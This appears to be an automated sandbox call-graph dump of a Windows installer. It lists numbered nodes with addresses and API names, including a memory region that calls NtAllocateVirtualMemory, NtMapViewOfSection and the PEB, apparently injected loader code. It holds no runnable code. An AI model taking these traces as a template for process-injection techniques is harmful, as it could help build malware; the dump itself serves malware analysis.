13774->13776 13775->13776 13776->13716 13778 406396 13777->13778 13779 40638b FindClose 13777->13779 13778->13724 13779->13778 13783 40578c 13780->13783 13781 4057d8 13781->13724 13782 4057a0 MessageBoxIndirectW 13782->13781 13783->13781 13783->13782 13785 405c8a ReadFile 13784->13785 13786 403079 13785->13786 13786->13758 13786->13759 13786->13760 13787->13754 13788 40156b 13789 401584 13788->13789 13790 40157b ShowWindow 13788->13790 13791 401592 ShowWindow 13789->13791 13792 402a4c 13789->13792 13790->13789 13791->13792 13962 40237b 13963 402381 13962->13963 13964 402bbf 18 API calls 13963->13964 13965 402393 13964->13965 13966 402bbf 18 API calls 13965->13966 13967 40239d RegCreateKeyExW 13966->13967 13968 4023c7 13967->13968 13969 402a4c 13967->13969 13970 4023e2 13968->13970 13971 402bbf 18 API calls 13968->13971 13972 4023ee 13970->13972 13974 402ba2 18 API calls 13970->13974 13973 4023d8 lstrlenW 13971->13973 13975 402409 RegSetValueExW 13972->13975 13976 403027 32 API calls 13972->13976 13973->13970 13974->13972 13977 40241f RegCloseKey 13975->13977 13976->13975 13977->13969 14711 401904 14712 40193b 14711->14712 14713 402bbf 18 API calls 14712->14713 14714 401940 14713->14714 14715 405823 69 API calls 14714->14715 14716 401949 14715->14716 14717 402d04 14718 402d16 SetTimer 14717->14718 14719 402d2f 14717->14719 14718->14719 14720 402d84 14719->14720 14721 402d49 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 14719->14721 14721->14720 14722 405105 14723 405115 14722->14723 14724 405129 14722->14724 14725 405172 14723->14725 14726 40511b 14723->14726 14727 405131 IsWindowVisible 14724->14727 14733 405148 14724->14733 14728 405177 CallWindowProcW 14725->14728 14729 404142 SendMessageW 14726->14729 14727->14725 14730 40513e 14727->14730 14731 405125 14728->14731 14729->14731 14735 404a5b SendMessageW 14730->14735 14733->14728 14740 404adb 14733->14740 14736 404aba SendMessageW 14735->14736 14737 404a7e GetMessagePos ScreenToClient SendMessageW 14735->14737 14738 404ab2 14736->14738 14737->14738 14739 404ab7 14737->14739 14738->14733 14739->14736 14749 406032 lstrcpynW 14740->14749 14742 404aee 14750 405f79 wsprintfW 14742->14750 14744 404af8 14745 40140b 2 API calls 14744->14745 14746 404b01 14745->14746 14751 406032 lstrcpynW 14746->14751 14748 404b08 14748->14725 14749->14742 14750->14744 14751->14748 14759 401907 14760 402bbf 18 API calls 14759->14760 14761 40190e 14760->14761 14762 405777 MessageBoxIndirectW 14761->14762 14763 401917 14762->14763 15683 404b0d GetDlgItem GetDlgItem 15684 404b5f 7 API calls 15683->15684 15691 404d78 15683->15691 15685 404c02 DeleteObject 15684->15685 15686 404bf5 SendMessageW 15684->15686 15687 404c0b 15685->15687 15686->15685 15688 404c42 15687->15688 15690 406054 18 API calls 15687->15690 15692 4040f6 19 API calls 15688->15692 15689 404f08 15695 404f12 SendMessageW 15689->15695 15701 404f1a 15689->15701 15696 404c24 SendMessageW SendMessageW 15690->15696 15694 404e5c 15691->15694 15702 404a5b 5 API calls 15691->15702 15714 404de9 15691->15714 15693 404c56 15692->15693 15697 4040f6 19 API calls 15693->15697 15694->15689 15698 404eb5 SendMessageW 15694->15698 15726 404d6b 15694->15726 15695->15701 15696->15687 15715 404c64 15697->15715 15704 404eca SendMessageW 15698->15704 15698->15726 15699 40415d 8 API calls 15705 4050fe 15699->15705 15700 404e4e SendMessageW 15700->15694 15706 404f33 15701->15706 15707 404f2c ImageList_Destroy 15701->15707 15711 404f43 15701->15711 15702->15714 15703 4050b2 15712 4050c4 ShowWindow GetDlgItem ShowWindow 15703->15712 15703->15726 15710 404edd 15704->15710 15708 404f3c GlobalFree 15706->15708 15706->15711 15707->15706 15708->15711 15709 404d39 GetWindowLongW SetWindowLongW 15713 404d52 15709->15713 15720 404eee SendMessageW 15710->15720 15711->15703 15725 404adb 4 API calls 15711->15725 15730 404f7e 15711->15730 15712->15726 15716 404d70 15713->15716 15717 404d58 ShowWindow 15713->15717 15714->15694 15714->15700 15715->15709 15719 404cb4 SendMessageW 15715->15719 15721 404d33 15715->15721 15723 404cf0 SendMessageW 15715->15723 15724 404d01 SendMessageW 15715->15724 15735 40412b SendMessageW 15716->15735 15734 40412b SendMessageW 15717->15734 15719->15715 15720->15689 15721->15709 15721->15713 15723->15715 15724->15715 15725->15730 15726->15699 15727 405088 InvalidateRect 15727->15703 15728 40509e 15727->15728 15731 404a16 21 API calls 15728->15731 15729 404fac SendMessageW 15733 404fc2 15729->15733 15730->15729 15730->15733 15731->15703 15732 405036 SendMessageW SendMessageW 15732->15733 15733->15727 15733->15732 15734->15726 15735->15691 14778 402515 14779 402bbf 18 API calls 14778->14779 14780 40251c 14779->14780 14783 405c07 GetFileAttributesW CreateFileW 14780->14783 14782 402528 14783->14782 15750 401b16 15751 402bbf 18 API calls 15750->15751 15752 401b1d 15751->15752 15753 402ba2 18 API calls 15752->15753 15754 401b26 wsprintfW 15753->15754 15755 402a4c 15754->15755 15770 401f1d 15771 402bbf 18 API calls 15770->15771 15772 401f24 15771->15772 15773 406408 5 API calls 15772->15773 15774 401f33 15773->15774 15775 401fb7 15774->15775 15776 401f4f GlobalAlloc 15774->15776 15776->15775 15777 401f63 15776->15777 15778 406408 5 API calls 15777->15778 15779 401f6a 15778->15779 15780 406408 5 API calls 15779->15780 15781 401f74 15780->15781 15781->15775 15785 405f79 wsprintfW 15781->15785 15783 401fa9 15786 405f79 wsprintfW 15783->15786 15785->15783 15786->15775 15787 2fa2da4 15788 2fad80a NtAllocateVirtualMemory 15787->15788 15789 2fa2daf 15788->15789 13580 40231f 13581 402324 13580->13581 13582 40234f 13580->13582 13583 402cc9 19 API calls 13581->13583 13584 402bbf 18 API calls 13582->13584 13586 40232b 13583->13586 13585 402356 13584->13585 13592 402bff RegOpenKeyExW 13585->13592 13587 402335 13586->13587 13591 40236c 13586->13591 13588 402bbf 18 API calls 13587->13588 13590 40233c RegDeleteValueW RegCloseKey 13588->13590 13590->13591 13593 402c93 13592->13593 13596 402c2a 13592->13596 13593->13591 13594 402c50 RegEnumKeyW 13595 402c62 RegCloseKey 13594->13595 13594->13596 13603 406408 GetModuleHandleA 13595->13603 13596->13594 13596->13595 13598 402c87 RegCloseKey 13596->13598 13601 402bff 5 API calls 13596->13601 13600 402c76 13598->13600 13600->13593 13601->13596 13602 402ca2 RegDeleteKeyW 13602->13600 13604 406424 13603->13604 13605 40642e GetProcAddress 13603->13605 13609 40639c GetSystemDirectoryW 13604->13609 13608 402c72 13605->13608 13607 40642a 13607->13605 13607->13608 13608->13600 13608->13602 13610 4063be wsprintfW LoadLibraryW 13609->13610 13610->13607 15790 2fa9999 15791 2fa999e 15790->15791 15792 2fa99b5 15790->15792 15793 2fb0a44 NtMapViewOfSection 15791->15793 15793->15792 14784 2fa8b9e 14785 2fa8c0c GetPEB 14784->14785 14787 2fa8db6 14785->14787 13793 40172d 13794 402bbf 18 API calls 13793->13794 13795 401734 SearchPathW 13794->13795 13796 40174f 13795->13796 14816 402537 14817 402562 14816->14817 14818 40254b 14816->14818 14820 402596 14817->14820 14821 402567 14817->14821 14819 402ba2 18 API calls 14818->14819 14826 402552 14819->14826 14823 402bbf 18 API calls 14820->14823 14822 402bbf 18 API calls 14821->14822 14824 40256e WideCharToMultiByte lstrlenA 14822->14824 14825 40259d lstrlenW 14823->14825 14824->14826 14825->14826 14827 4025e0 14826->14827 14829 405ce8 5 API calls 14826->14829 14830 4025ca 14826->14830 14828 405cb9 WriteFile 14828->14827 14829->14830 14830->14827 14830->14828 15808 401b37 15809 401b44 15808->15809 15810 401b88 15808->15810 15813 401bcd 15809->15813 15817 401b5b 15809->15817 15811 401bb2 GlobalAlloc 15810->15811 15812 401b8d 15810->15812 15814 406054 18 API calls 15811->15814 15826 402288 15812->15826 15829 406032 lstrcpynW 15812->15829 15815 406054 18 API calls 15813->15815 15813->15826 15814->15813 15818 402282 15815->15818 15827 406032 lstrcpynW 15817->15827 15822 405777 MessageBoxIndirectW 15818->15822 15818->15826 15819 401b9f GlobalFree 15819->15826 15821 401b6a 15828 406032 lstrcpynW 15821->15828 15822->15826 15824 401b79 15830 406032 lstrcpynW 15824->15830 15827->15821 15828->15824 15829->15819 15830->15826 13850 401939 13851 40193b 13850->13851 13852 402bbf 18 API calls 13851->13852 13853 401940 13852->13853 13856 405823 13853->13856 13896 405aee 13856->13896 13859 405862 13862 40598d 13859->13862 13910 406032 lstrcpynW 13859->13910 13860 40584b DeleteFileW 13861 401949 13860->13861 13862->13861 13867 406375 2 API calls 13862->13867 13864 405888 13865 40589b 13864->13865 13866 40588e lstrcatW 13864->13866 13911 405a32 lstrlenW 13865->13911 13868 4058a1 13866->13868 13872 4059a7 13867->13872 13870 4058b1 lstrcatW 13868->13870 13871 4058a7 13868->13871 13873 4058bc lstrlenW FindFirstFileW 13870->13873 13871->13870 13871->13873 13872->13861 13874 4059ab 13872->13874 13875 405982 13873->13875 13876 4058de 13873->13876 13877 4059e6 3 API calls 13874->13877 13875->13862 13879 405965 FindNextFileW 13876->13879 13889 405823 62 API calls 13876->13889 13891 405191 25 API calls 13876->13891 13893 405191 25 API calls 13876->13893 13895 405ed3 38 API calls 13876->13895 13915 406032 lstrcpynW 13876->13915 13916 4057db 13876->13916 13878 4059b1 13877->13878 13880 4057db 5 API calls 13878->13880 13879->13876 13883 40597b FindClose 13879->13883 13882 4059bd 13880->13882 13884 4059d7 13882->13884 13886 4059c1 13882->13886 13883->13875 13885 405191 25 API calls 13884->13885 13885->13861 13886->13861 13888 405191 25 API calls 13886->13888 13890 4059ce 13888->13890 13889->13876 13892 405ed3 38 API calls 13890->13892 13891->13879 13894 4059d5 13892->13894 13893->13876 13894->13861 13895->13876 13924 406032 lstrcpynW 13896->13924 13898 405aff 13925 405a91 CharNextW CharNextW 13898->13925 13901 405843 13901->13859 13901->13860 13902 4062c6 5 API calls 13908 405b15 13902->13908 13903 405b46 lstrlenW 13904 405b51 13903->13904 13903->13908 13905 4059e6 3 API calls 13904->13905 13907 405b56 GetFileAttributesW 13905->13907 13906 406375 2 API calls 13906->13908 13907->13901 13908->13901 13908->13903 13908->13906 13909 405a32 2 API calls 13908->13909 13909->13903 13910->13864 13912 405a40 13911->13912 13913 405a52 13912->13913 13914 405a46 CharPrevW 13912->13914 13913->13868 13914->13912 13914->13913 13915->13876 13917 405be2 2 API calls 13916->13917 13918 4057e7 13917->13918 13919 4057f6 RemoveDirectoryW 13918->13919 13920 4057fe DeleteFileW 13918->13920 13922 405808 13918->13922 13921 405804 13919->13921 13920->13921 13921->13922 13923 405814 SetFileAttributesW 13921->13923 13922->13876 13923->13922 13924->13898 13926 405aae 13925->13926 13929 405ac0 13925->13929 13928 405abb CharNextW 13926->13928 13926->13929 13927 405ae4 13927->13901 13927->13902 13928->13927 13929->13927 13930 405a13 CharNextW 13929->13930 13930->13929 14831 40293b 14832 402ba2 18 API calls 14831->14832 14833 402941 14832->14833 14834 402964 14833->14834 14835 40297d 14833->14835 14839 40281e 14833->14839 14836 402969 14834->14836 14842 40297a 14834->14842 14837 402993 14835->14837 14838 402987 14835->14838 14845 406032 lstrcpynW 14836->14845 14841 406054 18 API calls 14837->14841 14840 402ba2 18 API calls 14838->14840 14840->14839 14841->14839 14846 405f79 wsprintfW 14842->14846 14845->14839 14846->14839 14847 4029c0 14848 402ba2 18 API calls 14847->14848 14849 4029c6 14848->14849 14850 4029d4 14849->14850 14851 4029f9 14849->14851 14853 40281e 14849->14853 14850->14853 14855 405f79 wsprintfW 14850->14855 14852 406054 18 API calls 14851->14852 14851->14853 14852->14853 14855->14853 13053 401fc3 13054 401fd5 13053->13054 13055 402087 13053->13055 13076 402bbf 13054->13076 13058 401423 25 API calls 13055->13058 13064 4021e1 13058->13064 13059 402bbf 18 API calls 13060 401fe5 13059->13060 13061 401ffb LoadLibraryExW 13060->13061 13062 401fed GetModuleHandleW 13060->13062 13061->13055 13063 40200c 13061->13063 13062->13061 13062->13063 13082 406477 WideCharToMultiByte 13063->13082 13067 402056 13130 405191 13067->13130 13068 40201d 13070 402025 13068->13070 13071 40203c 13068->13071 13127 401423 13070->13127 13085 10001759 13071->13085 13072 40202d 13072->13064 13074 402079 FreeLibrary 13072->13074 13074->13064 13077 402bcb 13076->13077 13141 406054 13077->13141 13080 401fdc 13080->13059 13083 4064a1 GetProcAddress 13082->13083 13084 402017 13082->13084 13083->13084 13084->13067 13084->13068 13086 10001789 13085->13086 13180 10001b18 13086->13180 13088 10001790 13089 100018a6 13088->13089 13090 100017a1 13088->13090 13091 100017a8 13088->13091 13089->13072 13229 10002286 13090->13229 13212 100022d0 13091->13212 13096 1000180c 13102 10001812 13096->13102 13103 1000184e 13096->13103 13097 100017ee 13242 100024a9 13097->13242 13098 100017d7 13113 100017cd 13098->13113 13239 10002b5f 13098->13239 13099 100017be 13101 100017c4 13099->13101 13108 100017cf 13099->13108 13101->13113 13223 100028a4 13101->13223 13104 100015b4 3 API calls 13102->13104 13106 100024a9 10 API calls 13103->13106 13110 10001828 13104->13110 13111 10001840 13106->13111 13107 100017f4 13253 100015b4 13107->13253 13233 10002645 13108->13233 13116 100024a9 10 API calls 13110->13116 13118 10001895 13111->13118 13264 1000246c 13111->13264 13113->13096 13113->13097 13115 100017d5 13115->13113 13116->13111 13118->13089 13120 1000189f GlobalFree 13118->13120 13120->13089 13124 10001881 13124->13118 13268 1000153d wsprintfW 13124->13268 13126 1000187a FreeLibrary 13126->13124 13128 405191 25 API calls 13127->13128 13129 401431 13128->13129 13129->13072 13131 4051ac 13130->13131 13140 40524e 13130->13140 13132 4051c8 lstrlenW 13131->13132 13133 406054 18 API calls 13131->13133 13134 4051f1 13132->13134 13135 4051d6 lstrlenW 13132->13135 13133->13132 13137 405204 13134->13137 13138 4051f7 SetWindowTextW 13134->13138 13136 4051e8 lstrcatW 13135->13136 13135->13140 13136->13134 13139 40520a SendMessageW SendMessageW SendMessageW 13137->13139 13137->13140 13138->13137 13139->13140 13140->13072 13150 406061 13141->13150 13142 4062ac 13143 402bec 13142->13143 13175 406032 lstrcpynW 13142->13175 13143->13080 13159 4062c6 13143->13159 13145 406114 GetVersion 13145->13150 13146 40627a lstrlenW 13146->13150 13149 406054 10 API calls 13149->13146 13150->13142 13150->13145 13150->13146 13150->13149 13152 40618f GetSystemDirectoryW 13150->13152 13153 4061a2 GetWindowsDirectoryW 13150->13153 13154 4062c6 5 API calls 13150->13154 13155 406054 10 API calls 13150->13155 13156 40621b lstrcatW 13150->13156 13157 4061d6 SHGetSpecialFolderLocation 13150->13157 13168 405eff RegOpenKeyExW 13150->13168 13173 405f79 wsprintfW 13150->13173 13174 406032 lstrcpynW 13150->13174 13152->13150 13153->13150 13154->13150 13155->13150 13156->13150 13157->13150 13158 4061ee SHGetPathFromIDListW CoTaskMemFree 13157->13158 13158->13150 13165 4062d3 13159->13165 13160 40634e CharPrevW 13161 406349 13160->13161 13161->13160 13163 40636f 13161->13163 13162 40633c CharNextW 13162->13161 13162->13165 13163->13080 13165->13161 13165->13162 13166 406328 CharNextW 13165->13166 13167 406337 CharNextW 13165->13167 13176 405a13 13165->13176 13166->13165 13167->13162 13169 405f73 13168->13169 13170 405f33 RegQueryValueExW 13168->13170 13169->13150 13171 405f54 RegCloseKey 13170->13171 13171->13169 13173->13150 13174->13150 13175->13143 13177 405a19 13176->13177 13178 405a2f 13177->13178 13179 405a20 CharNextW 13177->13179 13178->13165 13179->13177 13271 1000121b GlobalAlloc 13180->13271 13182 10001b3c 13272 1000121b GlobalAlloc 13182->13272 13184 10001d7a GlobalFree GlobalFree GlobalFree 13185 10001d97 13184->13185 13204 10001de1 13184->13204 13186 100020ee 13185->13186 13195 10001dac 13185->13195 13185->13204 13188 10002110 GetModuleHandleW 13186->13188 13186->13204 13187 10001c1d GlobalAlloc 13197 10001b47 13187->13197 13190 10002121 LoadLibraryW 13188->13190 13191 10002136 13188->13191 13189 10001c86 GlobalFree 13189->13197 13190->13191 13190->13204 13279 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 13191->13279 13192 10001c68 lstrcpyW 13193 10001c72 lstrcpyW 13192->13193 13193->13197 13195->13204 13275 1000122c 13195->13275 13196 10002188 13198 10002195 lstrlenW 13196->13198 13196->13204 13197->13184 13197->13187 13197->13189 13197->13192 13197->13193 13200 10002048 13197->13200 13197->13204 13205 10001f37 GlobalFree 13197->13205 13209 1000122c 2 API calls 13197->13209 13210 10001cc4 13197->13210 13278 1000121b GlobalAlloc 13197->13278 13280 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 13198->13280 13203 10002090 lstrcpyW 13200->13203 13200->13204 13203->13204 13204->13088 13205->13197 13206 10002148 13206->13196 13211 10002172 GetProcAddress 13206->13211 13207 100021af 13207->13204 13209->13197 13210->13197 13273 1000158f GlobalSize GlobalAlloc 13210->13273 13211->13196 13220 100022e8 13212->13220 13214 10002415 GlobalFree 13215 100017ae 13214->13215 13214->13220 13215->13098 13215->13099 13215->13113 13216 100023d3 lstrlenW 13216->13214 13222 100023de 13216->13222 13217 100023ba GlobalAlloc CLSIDFromString 13217->13214 13218 1000238f GlobalAlloc WideCharToMultiByte 13218->13214 13219 1000122c GlobalAlloc lstrcpynW 13219->13220 13220->13214 13220->13216 13220->13217 13220->13218 13220->13219 13282 100012ba 13220->13282 13222->13214 13286 100025d9 13222->13286 13225 100028b6 13223->13225 13224 1000295b CreateFileA 13226 10002979 13224->13226 13225->13224 13227 10002a75 13226->13227 13228 10002a6a GetLastError 13226->13228 13227->13113 13228->13227 13230 10002296 13229->13230 13231 100017a7 13229->13231 13230->13231 13232 100022a8 GlobalAlloc 13230->13232 13231->13091 13232->13230 13237 10002661 13233->13237 13234 100026b2 GlobalAlloc 13238 100026d4 13234->13238 13235 100026c5 13236 100026ca GlobalSize 13235->13236 13235->13238 13236->13238 13237->13234 13237->13235 13238->13115 13240 10002b6a 13239->13240 13241 10002baa GlobalFree 13240->13241 13289 1000121b GlobalAlloc 13242->13289 13244 100024b3 13245 10002530 StringFromGUID2 13244->13245 13246 10002541 lstrcpynW 13244->13246 13247 1000250b MultiByteToWideChar 13244->13247 13248 10002571 GlobalFree 13244->13248 13249 10002554 wsprintfW 13244->13249 13250 100025ac GlobalFree 13244->13250 13251 10001272 2 API calls 13244->13251 13290 100012e1 13244->13290 13245->13244 13246->13244 13247->13244 13248->13244 13249->13244 13250->13107 13251->13244 13294 1000121b GlobalAlloc 13253->13294 13255 100015ba 13256 100015c7 lstrcpyW 13255->13256 13258 100015e1 13255->13258 13259 100015fb 13256->13259 13258->13259 13260 100015e6 wsprintfW 13258->13260 13261 10001272 13259->13261 13260->13259 13262 100012b5 GlobalFree 13261->13262 13263 1000127b GlobalAlloc lstrcpynW 13261->13263 13262->13111 13263->13262 13265 1000247a 13264->13265 13266 10001861 13264->13266 13265->13266 13267 10002496 GlobalFree 13265->13267 13266->13124 13266->13126 13267->13265 13269 10001272 2 API calls 13268->13269 13270 1000155e 13269->13270 13270->13118 13271->13182 13272->13197 13274 100015ad 13273->13274 13274->13210 13281 1000121b GlobalAlloc 13275->13281 13277 1000123b lstrcpynW 13277->13204 13278->13197 13279->13206 13280->13207 13281->13277 13283 100012c1 13282->13283 13284 1000122c 2 API calls 13283->13284 13285 100012df 13284->13285 13285->13220 13287 100025e7 VirtualAlloc 13286->13287 13288 1000263d 13286->13288 13287->13288 13288->13222 13289->13244 13291 100012ea 13290->13291 13292 1000130c 13290->13292 13291->13292 13293 100012f0 lstrcpyW 13291->13293 13292->13244 13293->13292 13294->13255 15852 4027ce 15853 4027d6 15852->15853 15854 4027da FindNextFileW 15853->15854 15857 4027ec 15853->15857 15855 402833 15854->15855 15854->15857 15858 406032 lstrcpynW 15855->15858 15858->15857 13419 2fad16f 13427 2fae63c 13419->13427 13421 2fad1b9 13431 2fad211 13421->13431 13423 2fad1d5 13433 2faef94 13423->13433 13425 2faef8f 13426 2faef94 NtAllocateVirtualMemory 13425->13426 13426->13425 13428 2fae64c 13427->13428 13430 2fa30f6 13427->13430 13429 2fae7ae NtAllocateVirtualMemory 13428->13429 13428->13430 13429->13430 13430->13421 13432 2fad2bb CreateFileA 13431->13432 13432->13423 13435 2fa313e 13433->13435 13436 2faefa4 13433->13436 13437 2fa5af2 13435->13437 13440 2fad80a 13435->13440 13436->13425 13438 2fae63c NtAllocateVirtualMemory 13437->13438 13439 2fa5b01 13438->13439 13439->13425 13442 2fa30f6 13440->13442 13445 2fad8e0 13442->13445 13449 2fa2fd6 13442->13449 13443 2fa30fb 13444 2fad80a NtAllocateVirtualMemory 13443->13444 13446 2fa5af2 13443->13446 13444->13443 13445->13435 13447 2fae63c NtAllocateVirtualMemory 13446->13447 13448 2fa5b01 13447->13448 13448->13435 13451 2fa2fea 13449->13451 13450 2fa2fef 13450->13443 13451->13450 13452 2fa2fd6 NtAllocateVirtualMemory 13451->13452 13454 2fa30fb 13451->13454 13452->13454 13453 2fad80a NtAllocateVirtualMemory 13453->13454 13454->13453 13455 2fa5af2 13454->13455 13456 2fae63c NtAllocateVirtualMemory 13455->13456 13457 2fa5b01 13456->13457 13457->13443 13475 401ddc 13476 402ba2 18 API calls 13475->13476 13477 401de2 13476->13477 13478 402ba2 18 API calls 13477->13478 13479 401deb 13478->13479 13480 401df2 ShowWindow 13479->13480 13481 401dfd EnableWindow 13479->13481 13482 402a4c 13480->13482 13481->13482 14877 2fa1767 14878 2fa1715 14877->14878 14878->14877 14879 2fa16d7 2 API calls 14878->14879 14880 2fa2309 14879->14880 14880->14880 14881 2fa2559 2 API calls 14880->14881 14882 2fa2554 14881->14882 14883 2fa2559 2 API calls 14882->14883 14883->14882 13612 401bdf 13613 402ba2 18 API calls 13612->13613 13614 401be6 13613->13614 13615 402ba2 18 API calls 13614->13615 13617 401bf0 13615->13617 13616 401c00 13618 401c10 13616->13618 13620 402bbf 18 API calls 13616->13620 13617->13616 13619 402bbf 18 API calls 13617->13619 13621 401c1b 13618->13621 13622 401c5f 13618->13622 13619->13616 13620->13618 13623 402ba2 18 API calls 13621->13623 13624 402bbf 18 API calls 13622->13624 13625 401c20 13623->13625 13626 401c64 13624->13626 13628 402ba2 18 API calls 13625->13628 13627 402bbf 18 API calls 13626->13627 13629 401c6d FindWindowExW 13627->13629 13630 401c29 13628->13630 13633 401c8f 13629->13633 13631 401c31 SendMessageTimeoutW 13630->13631 13632 401c4f SendMessageW 13630->13632 13631->13633 13632->13633 14884 4019e4 14885 402bbf 18 API calls 14884->14885 14886 4019eb 14885->14886 14887 402bbf 18 API calls 14886->14887 14888 4019f4 14887->14888 14889 4019fb lstrcmpiW 14888->14889 14890 401a0d lstrcmpW 14888->14890 14891 401a01 14889->14891 14890->14891 13655 4025e5 13656 402ba2 18 API calls 13655->13656 13661 4025f4 13656->13661 13657 40272d 13658 40263a ReadFile 13658->13657 13658->13661 13660 4026d3 13660->13657 13660->13661 13669 405ce8 SetFilePointer 13660->13669 13661->13657 13661->13658 13661->13660 13662 40267a MultiByteToWideChar 13661->13662 13663 40272f 13661->13663 13666 4026a0 SetFilePointer MultiByteToWideChar 13661->13666 13667 402740 13661->13667 13678 405c8a ReadFile 13661->13678 13662->13661 13680 405f79 wsprintfW 13663->13680 13666->13661 13667->13657 13668 402761 SetFilePointer 13667->13668 13668->13657 13670 405d04 13669->13670 13675 405d20 13669->13675 13671 405c8a ReadFile 13670->13671 13672 405d10 13671->13672 13673 405d51 SetFilePointer 13672->13673 13674 405d29 SetFilePointer 13672->13674 13672->13675 13673->13675 13674->13673 13676 405d34 13674->13676 13675->13660 13681 405cb9 WriteFile 13676->13681 13679 405ca8 13678->13679 13679->13661 13680->13657 13682 405cd7 13681->13682 13682->13675 14892 4021ea 14893 402bbf 18 API calls 14892->14893 14894 4021f0 14893->14894 14895 402bbf 18 API calls 14894->14895 14896 4021f9 14895->14896 14897 402bbf 18 API calls 14896->14897 14898 402202 14897->14898 14899 406375 2 API calls 14898->14899 14900 40220b 14899->14900 14901 40221c lstrlenW lstrlenW 14900->14901 14902 40220f 14900->14902 14904 405191 25 API calls 14901->14904 14903 405191 25 API calls 14902->14903 14905 402217 14902->14905 14903->14905 14906 40225a SHFileOperationW 14904->14906 14906->14902 14906->14905 14907 2fa0349 14908 2fa0370 14907->14908 14909 2fa16d7 2 API calls 14908->14909 14910 2fa2309 14909->14910 14911 2fa2559 2 API calls 14910->14911 14912 2fa2554 14911->14912 14913 2fa2559 2 API calls 14912->14913 14913->14912 15894 2fa594e 15895 2fa5965 15894->15895 15897 2fa598f 15895->15897 15898 2fa30f6 15895->15898 15896 2fa2fd6 NtAllocateVirtualMemory 15899 2fa30fb 15896->15899 15900 2fa5abb NtAllocateVirtualMemory 15897->15900 15898->15896 15903 2fad8e0 15898->15903 15901 2fad80a NtAllocateVirtualMemory 15899->15901 15904 2fa5af2 15899->15904 15902 2facfa5 15900->15902 15901->15899 15905 2fae63c NtAllocateVirtualMemory 15904->15905 15906 2fa5b01 15905->15906 15907 4027fb 15908 402bbf 18 API calls 15907->15908 15909 402802 FindFirstFileW 15908->15909 15910 402815 15909->15910 15911 40282a 15909->15911 15912 402833 15911->15912 15915 405f79 wsprintfW 15911->15915 15916 406032 lstrcpynW 15912->15916 15915->15912 15916->15910 13295 402786 13296 40278d 13295->13296 13298 4029f7 13295->13298 13303 402ba2 13296->13303 13299 402798 13300 40279f SetFilePointer 13299->13300 13300->13298 13301 4027af 13300->13301 13306 405f79 wsprintfW 13301->13306 13304 406054 18 API calls 13303->13304 13305 402bb6 13304->13305 13305->13299 13306->13298 14914 2fa5b3c 14915 2fa313e 14914->14915 14916 2fa5b01 14915->14916 14917 2fa5af2 14915->14917 14919 2fad80a NtAllocateVirtualMemory 14915->14919 14918 2fae63c NtAllocateVirtualMemory 14917->14918 14918->14916 14919->14915 13307 100027c7 13308 10002817 13307->13308 13309 100027d7 VirtualProtect 13307->13309 13309->13308 14941 404591 14942 4045bd 14941->14942 14943 4045ce 14941->14943 15002 40575b GetDlgItemTextW 14942->15002 14944 4045da GetDlgItem 14943->14944 14951 404639 14943->14951 14946 4045ee 14944->14946 14950 404602 SetWindowTextW 14946->14950 14954 405a91 4 API calls 14946->14954 14947 40471d 15000 4048cc 14947->15000 15004 40575b GetDlgItemTextW 14947->15004 14948 4045c8 14949 4062c6 5 API calls 14948->14949 14949->14943 14955 4040f6 19 API calls 14950->14955 14951->14947 14956 406054 18 API calls 14951->14956 14951->15000 14953 40415d 8 API calls 14958 4048e0 14953->14958 14959 4045f8 14954->14959 14960 40461e 14955->14960 14961 4046ad SHBrowseForFolderW 14956->14961 14957 40474d 14962 405aee 18 API calls 14957->14962 14959->14950 14966 4059e6 3 API calls 14959->14966 14963 4040f6 19 API calls 14960->14963 14961->14947 14964 4046c5 CoTaskMemFree 14961->14964 14965 404753 14962->14965 14967 40462c 14963->14967 14968 4059e6 3 API calls 14964->14968 15005 406032 lstrcpynW 14965->15005 14966->14950 15003 40412b SendMessageW 14967->15003 14971 4046d2 14968->14971 14973 404709 SetDlgItemTextW 14971->14973 14977 406054 18 API calls 14971->14977 14972 404632 14975 406408 5 API calls 14972->14975 14973->14947 14974 40476a 14976 406408 5 API calls 14974->14976 14975->14951 14985 404771 14976->14985 14978 4046f1 lstrcmpiW 14977->14978 14978->14973 14980 404702 lstrcatW 14978->14980 14979 4047b2 15006 406032 lstrcpynW 14979->15006 14980->14973 14982 4047b9 14983 405a91 4 API calls 14982->14983 14984 4047bf GetDiskFreeSpaceW 14983->14984 14987 4047e3 MulDiv 14984->14987 14989 40480a 14984->14989 14985->14979 14988 405a32 2 API calls 14985->14988 14985->14989 14987->14989 14988->14985 14990 40487b 14989->14990 15007 404a16 14989->15007 14992 40489e 14990->14992 14994 40140b 2 API calls 14990->14994 15018 404118 KiUserCallbackDispatcher 14992->15018 14994->14992 14995 40487d SetDlgItemTextW 14995->14990 14996 40486d 15010 40494d 14996->15010 14999 4048ba 14999->15000 15019 404526 14999->15019 15000->14953 15002->14948 15003->14972 15004->14957 15005->14974 15006->14982 15008 40494d 21 API calls 15007->15008 15009 404868 15008->15009 15009->14995 15009->14996 15011 404966 15010->15011 15012 406054 18 API calls 15011->15012 15013 4049ca 15012->15013 15014 406054 18 API calls 15013->15014 15015 4049d5 15014->15015 15016 406054 18 API calls 15015->15016 15017 4049eb lstrlenW wsprintfW SetDlgItemTextW 15016->15017 15017->14990 15018->14999 15020 404534 15019->15020 15021 404539 SendMessageW 15019->15021 15020->15021 15021->15000 15038 2fa8b20 15039 2fa9169 15038->15039 15040 2fa8b82 15038->15040 15041 2fb11a9 15040->15041 15042 2fa8d70 GetPEB 15040->15042 15043 2fa8db6 15042->15043 13471 40159b 13472 402bbf 18 API calls 13471->13472 13473 4015a2 SetFileAttributesW 13472->13473 13474 4015b4 13473->13474 15051 2fa630b 15052 2fa6310 15051->15052 15053 2fae63c NtAllocateVirtualMemory 15052->15053 15054 2fa633f 15052->15054 15053->15054 15057 2fa636a 15054->15057 15058 2fae63c NtAllocateVirtualMemory 15057->15058 15059 2fa63a7 15058->15059 15062 2fa646b 15059->15062 15061 2fa6464 15063 2fa64f9 15062->15063 15064 2fb11a9 15063->15064 15065 2fb0a44 NtMapViewOfSection 15063->15065 15064->15061 15066 2fa65b0 15065->15066 15067 2fa68ab 15066->15067 15068 2fb0a44 NtMapViewOfSection 15066->15068 15069 2fa6744 15066->15069 15067->15061 15068->15069 15069->15067 15070 2fb0a44 NtMapViewOfSection 15069->15070 15070->15067 15959 4027b4 15960 4027ba 15959->15960 15961 4027c2 FindClose 15960->15961 15962 402a4c 15960->15962 15961->15962 13931 4015b9 13932 402bbf 18 API calls 13931->13932 